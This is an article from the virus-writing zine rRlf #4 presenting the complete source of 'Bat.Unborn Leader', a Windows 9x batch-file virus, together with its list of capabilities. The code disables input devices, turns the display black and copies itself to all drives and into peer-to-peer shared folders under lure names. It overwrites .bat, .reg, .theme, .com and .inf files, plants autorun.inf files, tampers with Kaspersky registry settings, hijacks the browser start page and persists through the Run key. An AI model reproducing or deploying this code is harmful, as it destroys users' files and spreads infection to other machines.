rRlf #4

Redemption
Last article	Table of contents	Next article
Strange Article - Bat.Unborn Leader by DvL
 finished on: 22.09.2003, 15:15
 size: 10.927 bytes
 runs on: win9x

 ** Capabilities **

 * multi-infector, infects .bat, .reg, .theme, autorun.inf, .com, .inf
 * in autorun.inf infection the virus will run every time the user enters
   in "my computer"
 * in .com infection, some .com files will be overwritten with a small .com
   file that only displays a silly message (payload), it can not spread itself
 * .inf infection was designed to affect the desktop.inf file used by atari
   to display the desktop of the current machine running, but it will also
   overwrite all .inf files from "inf" folder or any other it found
 * attacks Kaspersky AntiVirus via registry
 * spreads via p2p
 * it will copy itself on every disk (except b:\)
 * it will set my webpage as the default internet startup page
 * it will run every time the computer is restarted via registry

=====[begin code]===============================================================
cLS
cTtY NuL
EChO OFf
bReAK oFF
rUNdLl32.ExE MoUSe,DiSAblE
RuNDlL32.ExE kEYboARd,diSAblE
Md c:\งฐธจน >nul
CoPy %0 c:\งฐธจน\joke.bat >nul
echo.[CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon]>_
echo.DefaultValue=c:\windows\Explorer.exe,0>>_
echo.>>_
echo.[CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon]>>_
echo.DefaultValue=c:\windows\System\shell32.dll,0>>_
echo.>>_
echo.[CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon]>>_
echo.empty=c:\windows\System\shell32.dll,0>>_
echo.full=c:\windows\System\shell32.dll,0>>_
echo.>>_
echo.>>_
echo.[Control Panel\Colors]>>_
echo.ActiveTitle=0 0 0>>_
echo.Background=0 0 0>>_
echo.Hilight=0 0 0>>_
echo.HilightText=0 0 0>>_
echo.TitleText=0 0 0>>_
echo.Window=0 0 0>>_
echo.WindowText=0 0 0>>_
echo.Scrollbar=0 0 0>>_
echo.InactiveTitle=0 0 0>>_
echo.Menu=0 0 0>>_
echo.WindowFrame=0 0 0>>_
echo.MenuText=0 0 0>>_
echo.ActiveBorder=0 0 0>>_
echo.InactiveBorder=0 0 0>>_
echo.AppWorkspace=0 0 0>>_
echo.ButtonFace=0 0 0>>_
echo.ButtonShadow=0 0 0>>_
echo.GrayText=0 0 0>>_
echo.ButtonText=0 0 0>>_
echo.InactiveTitleText=0 0 0>>_
echo.ButtonHilight=0 0 0>>_
echo.ButtonDkShadow=0 0 0>>_
echo.ButtonLight=0 0 0>>_
echo.InfoText=0 0 0>>_
echo.InfoWindow=0 0 0>>_
echo.>>_
echo.[Control Panel\Cursors]>>_
echo.Arrow=>>_
echo.Help=>>_
echo.AppStarting=>>_
echo.Wait=>>_
echo.NWPen=>>_
echo.No=>>_
echo.SizeNS=>>_
echo.SizeWE=>>_
echo.Crosshair=>>_
echo.IBeam=>>_
echo.SizeNWSE=>>_
echo.SizeNESW=>>_
echo.SizeAll=>>_
echo.UpArrow=>>_
echo.DefaultValue=Windows Default>>_
echo.>>_
echo.[Control Panel\Desktop]>>_
echo.Wallpaper=>>_
echo.TileWallpaper=0>>_
echo.WallpaperStyle=0>>_
echo.Pattern=(None)>>_
echo.ScreenSaveActive=0>>_
echo.>>_
echo.>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\.Default\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\AppGPFault\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Maximize\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\MenuCommand\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\MenuPopup\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Minimize\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Open\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RestoreDown\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RestoreUp\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\RingIn\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Ringout\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemAsterisk\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemDefault\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemExclamation\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemExit\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemHand\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemQuestion\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\SystemStart\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\Explorer\EmptyRecycleBin\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.[AppEvents\Schemes\Apps\.Default\Close\.Current]>>_
echo.DefaultValue=>>_
echo.>>_
echo.>>_
echo.>>_
echo.[Metrics]>>_
echo.IconMetrics=76 0 0 0 75 0 0 0 75 0 0 0 0 0 0 0 248 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 2 0 0 0 2 0 15 6 0 0 0 0 151 17 63 1 243 21>>_
echo.NonclientMetrics=84 1 0 0 1 0 0 0 13 0 0 0 13 0 0 0 18 0 0 0 18 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 188 2 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 15 0 0 0 15 0 0 0 248 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 188 2 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 18 0 0 0 18 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0 245 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 144 1 0 0 0 0 0 0 0 0 0 0 77 83 32 83 97 110 115 32 83 101 114 105 102 0 46 84 104 101 109 101 0 245 64 0 192 221 64 0 0 0 0 0>>_
echo.>>_
echo.>>_
echo.[boot]>>_
echo.SCRNSAVE.EXE=c:\งฐธจน\joke.bat>>_
echo.>>_
echo.[MasterThemeSelector]>>_
echo.MTSM=DABJDKT>>_
echo.ThemeColorBPP=4>>_
%comspec% nul /f /c if exist c:\nul copy %0 c:\cleanpc.bat
%comspec% nul /f /c if exist d:\nul copy %0 d:\winswp386.bat
%comspec% nul /f /c if exist e:\nul copy %0 e:\happy.bat
%comspec% nul /f /c if exist f:\nul copy %0 f:\funny.bat
%comspec% nul /f /c if exist g:\nul copy %0 g:\nice.bat
%comspec% nul /f /c if exist h:\nul copy %0 h:\freemp3.bat
%comspec% nul /f /c if exist i:\nul copy %0 i:\chicks.bat
%comspec% nul /f /c if exist j:\nul copy %0 j:\cunny.bat
%comspec% nul /f /c if exist k:\nul copy %0 k:\bigtits.bat
%comspec% nul /f /c if exist l:\nul copy %0 l:\strange.bat
%comspec% nul /f /c if exist m:\nul copy %0 m:\flower.bat
%comspec% nul /f /c if exist n:\nul copy %0 n:\convert.bat
%comspec% nul /f /c if exist o:\nul copy %0 o:\compress.bat
%comspec% nul /f /c if exist p:\nul copy %0 p:\pics.bat
%comspec% nul /f /c if exist q:\nul copy %0 q:\article.bat
%comspec% nul /f /c if exist r:\nul copy %0 r:\driver.bat
%comspec% nul /f /c if exist s:\nul copy %0 s:\sblaster.bat
%comspec% nul /f /c if exist t:\nul copy %0 t:\cdrom.bat
%comspec% nul /f /c if exist u:\nul copy %0 u:\update.bat
%comspec% nul /f /c if exist v:\nul copy %0 v:\add-on.bat
%comspec% nul /f /c if exist w:\nul copy %0 w:\program.bat
%comspec% nul /f /c if exist x:\nul copy %0 x:\contest.bat
%comspec% nul /f /c if exist y:\nul copy %0 y:\zine.bat
%comspec% nul /f /c if exist z:\nul copy %0 z:\test.bat
%comspec% nul /f /c if exist a:\nul copy %0 a:\winstart.bat
Copy %0 c:\kazaa\myshar~1\document.bat >nul
cOpy %0 c:\mydown~1\document.bat >nul
coPy %0 c:\mydocu~1\document.bat >nul
copy %0 c:\progra~1\applej~1\incoming\document.bat >nul
copy %0 c:\progra~1\bearsh~1\shared\document.bat >nul
copy %0 c:\progra~1\edonke~1\incoming\document.bat >nul
copy %0 c:\progra~1\emule\incoming\document.bat >nul
copy %0 c:\progra~1\grokster\mygrok~1\document.bat >nul
copy %0 c:\progra~1\icq\shared~1\document.bat >nul
copy %0 c:\progra~1\kazaa\myshar~1\document.bat >nul
copy %0 c:\progra~1\kazaal~1\myshar~1\document.bat >nul
copy %0 c:\progra~1\kmd\myshar~1\document.bat >nul
copy %0 c:\progra~1\limewire\shared\document.bat >nul
copy %0 c:\progra~1\morpheus\myshar~1\document.bat >nul
copy %0 c:\progra~1\overnet\bundles\document.bat >nul
echo.REGEDIT4>__
echo.>>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."avpfolder"="c:\งฐธจน">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."VEDataFilePath"="c:\งฐธจน">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."VEIndexFilePath"="c:\งฐธจน">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."MainDir"="c:\งฐธจน">>__
echo.[HKLM\Software\KasperskyLab\SharedFiles]>>__
echo."Folder"="c:\งฐธจน">>__
echo.[HKCU\Software\Microsoft\Internet Explorer\Main]>>__
echo."Start Page"="www.geocities.com/ratty_dvl/BATch/main.htm">>__
echo.[HKLM\Software\Microsoft\Windows\CurrentVersion\Run\]>>__
echo.@="start command /c c:\งฐธจน\joke.bat">>__
echo.[AutoRun]>___
echo.open=c:\งฐธจน\joke.bat>>___
echo.icon=c:\windows\System\shell32.dll,0>>___
%comspec% nul /f /c if exist c:\nul cOPy ___ c:\autorun.inf
%comspec% nul /f /c if exist d:\nul CopY ___ d:\autorun.inf
%comspec% nul /f /c if exist e:\nul cOPy ___ e:\autorun.inf
%comspec% nul /f /c if exist f:\nul CopY ___ f:\autorun.inf
echo.X5O!P%%@AP[4\PZX54(P^)7CC)7}$          Fucked by [DvL]          $H+H*>_!
echo.#a000000>._
echo.#b000000>>._
echo.#c7770007000600070055200505552220770557075055507703111103>>._
echo.#d>>._
echo.#E 18 12>>._
echo.#W 00 00 00 07 26 0C 00 @>>._
echo.#W 00 00 02 0B 26 09 00 @>>._
echo.#W 00 00 0A 0F 1A 09 00 @>>._
echo.#W 00 00 0E 01 1A 09 00 @>>._
echo.#M 00 00 00 FF A FLOPPY DISK@ @>>._
echo.#M 00 01 00 FF B FLOPPY DISK@ @>>._
echo.#T 00 03 02 FF   TRASH@ @>>._
echo.#F FF 04   @ *.*@ @>>._
echo.#D FF 01   @ *.*@ @>>._
echo.#G 03 FF   *.APP@ @ @>>._
echo.#G 03 FF   *.PRG@ @ @>>._
echo.#P 03 FF   *.TTP@ @ @>>._
echo.#F 03 04   *.TOS@ @ @>>._
FOr %%* In (*.theme ..\*.theme c:\mydocu~1\*.theme %windir%\*.theme %path%\*.theme %windir%\desktop\*.theme %windir%\command\ebd\*.theme %windir%\system\*.theme c:\progra~1\plus!\themes\*.theme %themedir%\*.theme) dO aTTriB -r -h -s -a %%*
fOR %%* iN (*.theme ..\*.theme c:\mydocu~1\*.theme %windir%\*.theme %path%\*.theme %windir%\desktop\*.theme %windir%\command\ebd\*.theme %windir%\system\*.theme c:\progra~1\plus!\themes\*.theme %themedir%\*.theme) Do cOPy _ %%* /Y
FOr %%_ In (c:\*.com *.com ..\*.com c:\mydocu~1\*.com %windir%\*.com %path%\*.com %windir%\desktop\*.com %windir%\system\*.com) dO aTTriB -R -h -S -a %%_
fOR %%_ iN (c:\*.com *.com ..\*.com c:\mydocu~1\*.com %windir%\*.com %path%\*.com %windir%\desktop\*.com %windir%\system\*.com) Do cOPy _! %%_ /y
FOr %%! In (c:\*.bat *.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\system\*.bat) dO aTTriB -R -h -S -a %%!
fOR %%! iN (c:\*.bat *.bat ..\*.bat c:\mydocu~1\*.bat %windir%\*.bat %path%\*.bat %windir%\desktop\*.bat %windir%\system\*.bat) Do cOPy %0 %%! /y
FOr %%. In (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) dO aTTriB -R -h -S -a %%.
fOR %%. iN (c:\*.reg *.reg ..\*.reg c:\mydocu~1\*.reg %windir%\*.reg %path%\*.reg %windir%\desktop\*.reg %windir%\system\*.reg) Do cOPy __ %%. /y
FOr %%- In (*.in* ..\*.in* c:\mydocu~1\*.in* %windir%\inf\*.in* %windir%\*.in* %path%\*.in* c:\*.in* %windir%\system\*.in* c:\progra~1\steem\*.in* c:\progra~1\gemul8r\*.in* c:\steem\*.in* c:\gemul8r\*.in*) dO aTTriB -R -h -S -a %%-
fOR %%- iN (*.in* ..\*.in* c:\mydocu~1\*.in* %windir%\inf\*.in* %windir%\*.in* %path%\*.in* c:\*.in* %windir%\system\*.in* c:\progra~1\steem\*.in* c:\progra~1\gemul8r\*.in* c:\steem\*.in* c:\gemul8r\*.in*) Do cOPy ._ %%- /y
rEN __ __.reg
regedit /s __.reg
cLS
living virus